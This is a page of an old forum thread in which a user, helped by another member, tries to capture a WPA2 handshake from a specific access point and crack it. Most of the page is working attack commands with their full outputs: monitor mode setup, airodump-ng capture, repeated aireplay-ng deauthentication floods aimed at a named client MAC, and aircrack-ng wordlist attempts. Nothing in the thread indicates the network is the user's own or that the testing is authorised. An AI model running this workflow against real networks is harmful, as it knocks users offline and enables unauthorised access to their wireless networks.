Page 3 of 8 FirstFirst 12345 ... LastLast
Results 21 to 30 of 77

Thread: Still have problem capturing WPA handshake

  1. #21
    Junior Member
    Join Date
    Jan 2009
    Posts
    59

    Default

    Code:
    CH  4 ][ Elapsed: 25 mins ][ 2009-03-16 06:31 ][ fixed channel eth1: 11
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E
    
     00:11:6B:18:EB:F6   20   0    10383      207    0   4  54 . WPA2 CCMP   PSK  W
    
     BSSID              STATION            PWR   Rate   Lost  Packets  Probe
    
     00:11:6B:18:EB:F6  00:16:EA:C8:27:30   41   0- 6e     0     1346

  2. #22
    Junior Member
    Join Date
    Jan 2009
    Posts
    59

    Default

    hxxp://i693.photobucket.com/albums/vv299/charlescywong/P1030769.jpg

    This is the wireless adaptor I am using

  3. #23
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    OK........ here we go.... open a fresh console and try the following:

    Code:
    ifconfig eth1 down
    ifconfig eth1 up
    iwconfig eth1 mode monitor
    iwconfig eth1 rate 1M
    airmon-ng start eth1
    iwconfig
    Open ANOTHER fresh console, copy:
    Code:
    airodump-ng -c 4 --bssid 00:11:6B:18:EB:F6 -w wpa20090315 eth1
    Keep it running......

    Open ANOTHER one. Try now:
    Code:
    aireplay-ng -0 2 -a 00:11:6B:18:EB:F6 -c 00:16:EA:C8:27:30 eth1
    You should get a handshake in 2nd console. If not, please give us all outputs.....

  4. #24
    Junior Member
    Join Date
    Jan 2009
    Posts
    59

    Default

    Code:
    bt ~ # ifconfig eth1 down
    bt ~ # ifconfig eth1 up
    bt ~ # iwconfig eth1 mode monitor
    bt ~ # iwconfig eth1 rate 1M
    bt ~ # airmon-ng start eth1
    
    
    Found 1 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    
    PID     Name
    3535    dhcpcd
    
    
    Interface       Chipset         Driver
    
    eth1            ZyDAS 1211      zd1211rw (monitor mode enabled)
    
    bt ~ # iwconfig
    lo        no wireless extensions.
    
    eth0      no wireless extensions.
    
    eth1      IEEE 802.11b/g  ESSID:off/any  Nickname:"zd1211"
              Mode:Monitor  Frequency:2.472 GHz  Access Point: Invalid
              Bit Rate=1 Mb/s
              Encryption key:off
              Link Quality:0  Signal level:0  Noise level:0
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:0   Missed beacon:0
    
    bt ~ #
    Code:
     CH  4 ][ Elapsed: 5 mins ][ 2009-03-17 04:38 ][ fixed channel eth1: 13
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:11:6B:18:EB:F6   24   0     2481       42    0   4  54 . WPA2 CCMP   PSK  WBR-6000
    
     BSSID              STATION            PWR   Rate   Lost  Packets  Probe
    
     00:11:6B:18:EB:F6  00:16:EA:C8:27:30   47   0- 6e     0      325
    Code:
    bt ~ # aireplay-ng -0 2 -a 00:11:6B:18:EB:F6 -c 00:16:EA:C8:27:30 eth1
    04:33:46  Waiting for beacon frame (BSSID: 00:11:6B:18:EB:F6) on channel 4
    04:33:46  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs]
    04:33:47  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs]
    Why I can't get any handshake?

  5. #25
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    At last, I figured out your problem...Somehow, your card is fixed at channel 13 (2.472 GHz). Your AP is on channel 4 (2.427 GHz)....

    That's why your airodump shows:
    fixed channel eth1: 13
    And iwconfig shows:
    eth1 IEEE 802.11b/g ESSIDff/any Nickname:"zd1211"
    Mode:Monitor Frequency:2.472 GHz Access Point: Invalid
    Bit Rate=1 Mb/s
    Encryption keyff
    Link Quality:0 Signal level:0 Noise level:0
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0

  6. #26
    Junior Member
    Join Date
    Jan 2009
    Posts
    59

    Default

    But I try to change and fix the channel to channel 4, however, it doesn't stay... Why is that?

    Code:
    bt ~ # ifconfig eth1 down
    bt ~ # ifconfig eth1 up
    bt ~ # iwconfig eth1 mode monitor
    bt ~ # iwconfig eth1 rate 1M
    bt ~ # airmon-ng start eth1 4
    
    
    Found 1 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    
    PID     Name
    3509    dhcpcd
    
    
    Interface       Chipset         Driver
    
    eth1            ZyDAS 1211      zd1211rw (monitor mode enabled)
    
    bt ~ # iwconfig
    lo        no wireless extensions.
    
    eth0      no wireless extensions.
    
    eth1      IEEE 802.11b/g  ESSID:off/any  Nickname:"zd1211"
              Mode:Monitor  Frequency:2.472 GHz  Access Point: Invalid
              Bit Rate=1 Mb/s
              Encryption key:off
              Link Quality:0  Signal level:0  Noise level:0
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:0   Missed beacon:0
    
    bt ~ # iwlist eth1 channel
    eth1      13 channels in total; available frequencies :
              Channel 01 : 2.412 GHz
              Channel 02 : 2.417 GHz
              Channel 03 : 2.422 GHz
              Channel 04 : 2.427 GHz
              Channel 05 : 2.432 GHz
              Channel 06 : 2.437 GHz
              Channel 07 : 2.442 GHz
              Channel 08 : 2.447 GHz
              Channel 09 : 2.452 GHz
              Channel 10 : 2.457 GHz
              Channel 11 : 2.462 GHz
              Channel 12 : 2.467 GHz
              Channel 13 : 2.472 GHz
              Current Frequency:2.427 GHz (Channel 4)
    
    bt ~ # iwlist eth1 channel
    eth1      13 channels in total; available frequencies :
              Channel 01 : 2.412 GHz
              Channel 02 : 2.417 GHz
              Channel 03 : 2.422 GHz
              Channel 04 : 2.427 GHz
              Channel 05 : 2.432 GHz
              Channel 06 : 2.437 GHz
              Channel 07 : 2.442 GHz
              Channel 08 : 2.447 GHz
              Channel 09 : 2.452 GHz
              Channel 10 : 2.457 GHz
              Channel 11 : 2.462 GHz
              Channel 12 : 2.467 GHz
              Channel 13 : 2.472 GHz
              Current Frequency:2.472 GHz (Channel 13)

  7. #27
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Before & After airmon-ng, please try to use:
    Code:
    sudo iwconfig eth1 channel 4
    start airodump with 2 digit channel number.
    Code:
    airodump-ng -c 04 --bssid 00:11:6B:18:EB:F6 -w wpa20090316 eth1
    Now, check the channel frequency

  8. #28
    Junior Member
    Join Date
    Jan 2009
    Posts
    59

    Default

    Code:
    bt ~ # ifconfig eth1 down
    bt ~ # ifconfig eth1 up
    bt ~ # iwconfig eth1 mode monitor
    bt ~ # iwconfig eth1 rate 1M
    bt ~ # sudo iwconfig eth1 channel 4
    bt ~ # airmon-ng start eth1
    
    
    Found 1 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    
    PID     Name
    3509    dhcpcd
    
    
    Interface       Chipset         Driver
    
    eth1            ZyDAS 1211      zd1211rw (monitor mode enabled)
    
    bt ~ #
    Code:
    CH  4 ][ Elapsed: 13 mins ][ 2009-03-17 06:29 ][ fixed channel eth1: 13
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:11:6B:18:EB:F6   27   0     5640      131    0   4  54 . WPA2 CCMP   PSK  WBR-6000
    
     BSSID              STATION            PWR   Rate   Lost  Packets  Probe
    
     00:11:6B:18:EB:F6  00:16:EA:C8:27:30   39   0- 6e     2      777

    Code:
    bt ~ # iwlist eth1 channel
    eth1      13 channels in total; available frequencies :
              Channel 01 : 2.412 GHz
              Channel 02 : 2.417 GHz
              Channel 03 : 2.422 GHz
              Channel 04 : 2.427 GHz
              Channel 05 : 2.432 GHz
              Channel 06 : 2.437 GHz
              Channel 07 : 2.442 GHz
              Channel 08 : 2.447 GHz
              Channel 09 : 2.452 GHz
              Channel 10 : 2.457 GHz
              Channel 11 : 2.462 GHz
              Channel 12 : 2.467 GHz
              Channel 13 : 2.472 GHz
              Current Frequency:2.427 GHz (Channel 4)
    Code:
    bt ~ # aireplay-ng -0 2 -a 00:11:6B:18:EB:F6 -c 00:16:EA:C8:27:30 eth1
    06:17:43  Waiting for beacon frame (BSSID: 00:11:6B:18:EB:F6) on channel 4
    06:17:43  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs]
    06:17:45  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 4| 1 ACKs]
    bt ~ # aireplay-ng -0 10 -a 00:11:6B:18:EB:F6 -c 00:16:EA:C8:27:30 eth1
    06:18:03  Waiting for beacon frame (BSSID: 00:11:6B:18:EB:F6) on channel 4
    06:18:05  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 4| 9 ACKs]
    06:18:06  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 2|12 ACKs]
    06:18:08  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 4| 8 ACKs]
    06:18:09  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 2| 1 ACKs]
    06:18:10  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs]
    06:18:12  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 3| 0 ACKs]
    06:18:13  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [19| 2 ACKs]
    06:18:14  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [16| 0 ACKs]
    06:18:15  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [17| 0 ACKs]
    06:18:16  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 2| 0 ACKs]
    bt ~ # aireplay-ng -0 10 -a 00:11:6B:18:EB:F6 -c 00:16:EA:C8:27:30 eth1
    06:22:19  Waiting for beacon frame (BSSID: 00:11:6B:18:EB:F6) on channel 4
    06:22:19  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 2| 1 ACKs]
    06:22:21  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 2| 1 ACKs]
    06:22:21  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs]
    06:22:24  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 1 ACKs]
    06:22:25  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 1 ACKs]
    06:22:27  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 2| 0 ACKs]
    06:22:28  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [21| 0 ACKs]
    06:22:29  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 9| 0 ACKs]
    06:22:31  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 2| 0 ACKs]
    06:22:32  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs]
    bt ~ # aireplay-ng -0 10 -a 00:11:6B:18:EB:F6 -c 00:16:EA:C8:27:30 eth1
    06:22:49  Waiting for beacon frame (BSSID: 00:11:6B:18:EB:F6) on channel 4
    06:22:51  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [38| 0 ACKs]
    06:22:52  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [116| 2 ACKs]
    06:22:54  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [36| 0 ACKs]
    06:22:55  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [117| 2 ACKs]
    06:22:57  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [60| 0 ACKs]
    06:22:58  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [117| 1 ACKs]
    06:22:59  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [58| 1 ACKs]
    06:23:01  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [113| 0 ACKs]
    06:23:02  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [42| 0 ACKs]
    06:23:03  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [103| 0 ACKs]
    bt ~ #
    Code:
    Quitting aircrack-ng...
    bt ~ # aircrack-ng -w password.lst -b 00:11:6B:18:EB:F6 wpa20090316*.cap
    Opening wpa20090316-01.cap
    Opening wpa20090316-02.cap
    Opening wpa20090316-03.cap
    No valid WPA handshakes found..
    
    
    Quitting aircrack-ng...
    bt ~ # aircrack-ng -w password.lst -b 00:11:6B:18:EB:F6 wpa20090316*.cap
    Opening wpa20090316-01.cap
    Opening wpa20090316-02.cap
    Opening wpa20090316-03.cap
    No valid WPA handshakes found..
    
    
    Quitting aircrack-ng...
    bt ~ #
    I still cannot capture any handshake...

  9. #29
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Your NIC is still at channel 13....
    Don't know why..... Sorry.. May be PMing few senior members will help...

  10. #30
    Member
    Join Date
    Jan 2010
    Posts
    332

    Default

    One more reason why your card could be fixed to ch 13 is if you have kismet running in another shell (ch locked 13).

    You could also try to use kismet to lock the card to a desired channel (L).
    SecurityTube has two new sections. Questions & News

Page 3 of 8 FirstFirst 12345 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •